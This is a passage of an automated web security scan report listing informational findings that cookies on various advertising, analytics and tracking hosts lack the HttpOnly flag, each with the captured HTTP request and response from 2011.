pf=J7x2bDuUKEtvib99_cZ-goPkzf6fIWdT9qM0aQWLwdOF_EilXRDpaVZoH21hYpbQ_z8HPYaM65wmqlJy40vBadBs7ec_hKVpWmzGgpiPlJRmhHY91Od4ptjK1iXzWgf7YM9JcWUydwSjnVf6q-FUanruxK4uefgXP7ZdyVROLv_EX4Zs9uuxOorR1jFrO1zcG_gdEQnib-clYfloOv_2lwqppjPBjFKyV8EeX_PmZ3toWeNBBG1YXENBRnS36DX-DH4SpQ7ShuV2d-NYFVtIGU4rg9s3nC4Mr4n244WBenfBQvgZwq9RRhbU_X2h51k_lFNMYeW93reJZIhHwSGf_H-AGq493sR64bEOrwMdlInQ3_hhak8rBdJ58aGNvtefEliM6K91jkZgRPytvxuPwribim3vmqyyNBTkZPK5bgtSa2VlsCnfIOdALl2CJqdkZhmGNuRHWDVgBcQKTDDI-C9HqiYDbJbNB9CX-bFduf_4wzqymhlU8NzniYzSnw97-nSMv1Ur7Z33pZwY9l2NMakidhN29b9Ofr7Bq7FDEQcPY-IpYg2t0xP7y14kXbvwzIk6XrRVIeLEk3n3FI0YFZVmhyfxvd90ZjpkD7U8TStLwdQl5LwjuZaLFoSxXtBK8KH60FpkU0G2gUnrflL9VTpu1O3vB60oRbvgxyp7z_Z0Gj8TYsZ0VCNltzB03G6c72uqjTU8jXqaUrgLcC4GUHIhMbOsM46CGu-xrQeqV53rZ5hJ1gzXgXpkNzuBwm3r-S_dMVUuhga3jszadxpL1ZqjTPRel5cEUgvdDJ3MOq3cc9BWe8XEPGAMQ9qkOUlqGfVpydvdh9VRg3TWc9nfe02J4PEhStINh_XK4qMZTFuGGyT7t6QcnkTiZaHi0iLCxy1cRxFPUGLCYHB__cvofgze4Dc1hJxT0qQAT0ZLxqdw-zylhvnUb3_v8KQ_u7h4C3cz5441iPfVZlnGI8FgjEdPX9Io8AztWyBMT2jbhtEhnytyITpkI7EMsodby4wJb3KWxiTvNz649iNqdkmppJ9Y2MrznAPiuM_iUf3CtQcvajZWDQ_aU2sdChXIJdmqhSsp4k98i5kptq3O_jJiG387HHM8N-mnxbLV49hpZl7HB6tKRWD9ta5CqqOGJxje1FD94IKAWvmqSeRURV7BZkq-DriWTk4W8Lg253t80LGdVztl5fhi82YM7eGVbuMBszjs_o8TR8fdMx9KU2g8RAyPuIMJlWM10E2GhmQFiSiVitV2wOqxS_4UWGiszU0GXyRCXufbfkPvN1ZTjv5plHd9vB9RwBmjkvSCLTbIi-zSd1IhObGWnMROa1bnsqaUNCdVavrtKz0RY8zOpsBdGICyM1qCRBVjoHmmGFhLVc8

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sun, 23-Oct-2011 18:46:24 GMT; Path=/
Set-Cookie: pf=RJBxLMKoVxCS-qMwX-xMpY1mH9Pu7p9NFtiFJSMdiybXTSH-IWQ6DNANSP75aijjdO23HSD7pyKr7DJ1joDUWM468DdJSOgljJ2xbi_l9u9ZxeTKQ54b6bMN5_hAEHvCC85A780w7bxirRefrrfdUQ5MGbQVS-ANev-_kQHmfkNQ6smQv5og4PkHqE3X_RQkCakAc4d8keEQlchNYzoHfZxtEyIFIozc8UfkJOOkQ-y5dEvDEzVGTQvjJ5k4ByfPCozyJ9TkdmXRA1qxfrSsssRSltQ60aZH2ijZovuR0NiMGHVgt7mgGsocub0zzJ5vfevB_hMBPVMHU4yqxUoa7563WNzfYatz3anBXP8vJNV8OIDJ2_d_TikgprD9eTEY9Svij-enRxMzjoTCiSuJJ5cQvQaai4KELW1OcRDj42OoDHZ35qYjbMJGiS7H6QzBEMEL6z9O7ZZ-dVK-LB9x5eVCCbLDRgQ9SZzWAlO-DzghO5M4qVwWOnD0WVFMRlpVb5YZ-H7HIhkf4JnbunSJ5rDfQltqIDPsW-Nw3VdjWZJ43hQ9SJBXAnXR6ZsvuRwrGwTDhUn95yBj7Q4uDzGAkdX_RaPPovuNmnIWrbdeEmglk0GxXPQeX3Dvmx1yQF6VY5FoqJUdFAx0sVTWl-uIoOMbxQE4RsOHkMPB4p-MP-YY668t6y8gl90k0_Ch-iwZo3Fk_tXEG6JfREHm48zIWZDeK9bfnUMOwxDvr7BzsPLnVwKnaDWLDf3zo8tYr4j36IMQ3-ltbShuD8pnWtQRyLGu8QSpcwiIyXCmH-UzJwp7ufJ8BSOSuEt0C5fhAn-tyQ5fl83GHPtUMgYlHGpHnWPD7H-4YnnKAJFDDILVU8WpcrIOaIktJDZ05dwOs59t8PVekksAdPxiQnJQKxaKphBHmnt_RBJIUtMr7Z0JF2Qi2OYxHAtrLlIf7S1cmEc1eFqcfW_diSuZqY6P-rN3jb6npanG9dmmctHHtv2CeESdXVKpwAKy70JR2CGQfW1Gms-OAvsUfF4QOe8a5AlmNZMWfQJZnus8Ac3RXH4pap39MPaAnleHet5XiG5PWa8YmVlR5RbNDS9j9hPCX3_q_Y_T31T07l7J2GhmoSGChftmOIC8Fyb1ISAB9loHZvlI9e1rshh1EbZFQ-ZFDp05I3ntk83ew_643lAS3ZwiuiCgmkuCbN4ZbhzIzGj9Wcrgz0jyp-OYSl6V2ZcRa3_qs1IgC5bdvkso5nn_Gn1b8YIkiGw_ITVrv4NZI32a2OMBC7PHeZlRh6cpoM8iSZGGpI8Ir0oB475leuQMcic84O9310UIlDzL0OkBq79wqGBg-sXLp-ClVLZTYHBhcMzoqsqCWV6kP7CTcP_vuQ0mXIfXZqJmKSW9mhtROAv63-Z_urduab59q8XAzaNdD2vW8t9OsswEbC4jBmCeR4IID_Ipp46PLUIFwvIzNsNMQb2FFoyIxxAqD2pYwL35Ly1yK_rac_irqC2rJv3tD2-bR9I; Domain=.turn.com; Expires=Sun, 23-Oct-2011 18:46:24 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1081801&t=2
Content-Length: 0
Date: Tue, 26 Apr 2011 18:46:24 GMT


14.110. http://realestate.msn.us.intellitxt.com/al.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /al.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 38
Date: Tue, 26 Apr 2011 18:46:36 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1();}catch(e){}

14.111. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=20029 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGqngA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:45:47 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGqngA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:45:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:45:47 GMT
Age: 0
Connection: keep-alive
Content-Length: 11085

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

14.112. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848219889&p=%7C162495&pt=%7Ccart_page.right%7Ccart_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43554%7C1%3Apromtype%253Dinternal&pref=http%3A%2F%2Fwest.thomson.com%2Fdefault.aspx&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=3d67d3c1-f356-442c-f616-e44be4d19914; vihc=b73.1303848202747.21158348%7C; pvihc=b73.1303848202747.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:31 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: pendprch=b73.1303848211052.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; Expires=Sun, 14-May-2079 23:17:38 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19175

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'cart_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...

14.113. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848411250&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:06:41 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; Expires=Sun, 14-May-2079 23:20:48 GMT; Path=/
Set-Cookie: vihc=b73.1303848401787.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848401787.21158348%7C; Expires=Fri, 23-Apr-2021 20:06:41 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 18802

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...

14.114. http://reviews.west.thomson.com/logging  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reviews.west.thomson.com
Path:   /logging

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging?page=http%3A//reviews.west.thomson.com/8456/160547/reviews.htm%3Fformat%3Dembedded HTTP/1.1
Host: reviews.west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/plain;charset=utf-8
Vary: Accept-Encoding
Expires: Tue, 26 Apr 2011 20:03:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 20:03:37 GMT
Connection: close
Set-Cookie: ARPT=WYZMZMS10.10.32.20CKKLK; path=/
Content-Length: 45

Captured page load timeout at 4/26/11 3:03 PM

14.115. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.feedsportal.com
Path:   /c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm HTTP/1.1
Host: rss.feedsportal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 OK
Server: FeedsPortal
Set-Cookie: MF2=1afpctay3oghk; domain=.feedsportal.com; expires=Thu, 25-Apr-2013 21:48:56 GMT; path=/
Location: http://da.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/ia1.htm
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 0
Date: Tue, 26 Apr 2011 21:48:55 GMT
Connection: close


14.116. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.202&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:38095-53051:s:50741-63737:mac
goog-phish-shavar;a:158725-169966:s:78455-82690:mac
goog-badbinurl-shavar;a:137-2711:s:61-2593:mac
goog-badbin-digestvar;a:19-2082:s:3-536:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=eff0a0789d228775:TM=1318938900:LM=1318938900:S=6cRJ1AFSfCanDMX2; expires=Thu, 17-Oct-2013 11:55:00 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 18 Oct 2011 11:55:00 GMT
Server: Chunked Update Server
Content-Length: 1931
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Tue, 18 Oct 2011 11:55:00 GMT
Cache-Control: private

m:AIRkvuGakBT0DPCEphoLRvh-xb8=
n:1806
i:goog-badbin-digestvar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQARiYBCCcBCoFHAIAAAEyBRgCAAAP,W7NzU6Z1ARemSmCM1_K-7qwGdC8=

...[SNIP]...

14.117. http://sales.liveperson.net/hc/18987408/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/18987408/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/18987408/?&visitor=16601209214853&site=18987408&cmd=mTagKnockPage&lpCallId=195172628155-227342517348&protV=20&lpjson=1&id=6391686124&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-adcenter-us-english-lpChatButtonDIV%7ClpMTagConfig.db1%7ClpChatButtonDIV%7C%23voice-adcenter-us-english-lpVoiceButtonDIV%7ClpMTagConfig.db1%7ClpVoiceButtonDIV%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/home?s_cid=us_msn_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303834849435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=9136137423460607972; path=/hc/18987408
Set-Cookie: HumanClickKEY=9136137423460607972; path=/hc/18987408
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 18:45:30 GMT
Set-Cookie: HumanClickSiteContainerID_18987408=STANDALONE; path=/hc/18987408
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2916

lpConnLib.Process({"ResultSet": {"lpCallId":"195172628155-227342517348","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

14.118. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; mbox=PC#1303601743323-887111.17#1306068395|session#1303649073183-321692#1303651055|check#true#1303649261; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 00:35:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www6.dmz
Content-Length: 485
Content-Type: application/javascript
Date: Tue, 26 Apr 2011 20:35:19 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=173.193.214.243',
'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region
...[SNIP]...

14.119. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.bcbst.com
Path:   /dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif?&dcsdat=1303849601203&dcsuri=/blank&WT.tz=-5&WT.bh=15&WT.ul=en-us&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=BlueAccess%20-%20BCBST.com&WT.js=Yes&WT.jv=1.3&WT.ct=lan&WT.hp=1&WT.bs=1x1&WT.fi=No&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sdc.bcbst.com

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Tue, 26 Apr 2011 20:26:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif?dcsredirect=1&dcsdat=1303849601203&dcsuri=/blank&WT.tz=-5&WT.bh=15&WT.ul=en-us&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=BlueAccess%20-%20BCBST.com&WT.js=Yes&WT.jv=1.3&WT.ct=lan&WT.hp=1&WT.bs=1x1&WT.fi=No&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.vt_f_a=2&WT.vt_f=2
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1013173456.30147664; expires=Fri, 23-Apr-2021 20:26:34 GMT; path=/dcs962n2r10000w49zv2i4z3u_3s7u
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.120. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.bcbst.com
Path:   /dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif?dcsredirect=1&dcsdat=1303849513700&dcssip=www.bcbst.com&dcsuri=/&WT.co_f=173.193.214.243-104623456.30147664&WT.vt_sid=173.193.214.243-104623456.30147664.1303849513702&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=15&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Health%20Insurance%20in%20Tennessee,%20BlueCross%20BlueShield%20of%20Tennessee&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1095x937&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-104623456.30147664; TLTSID=7F1898414E7D09A8923A98850107EF43

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 16:00:42 GMT
Accept-Ranges: bytes
ETag: "0f1d8c1d160c71:12352"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
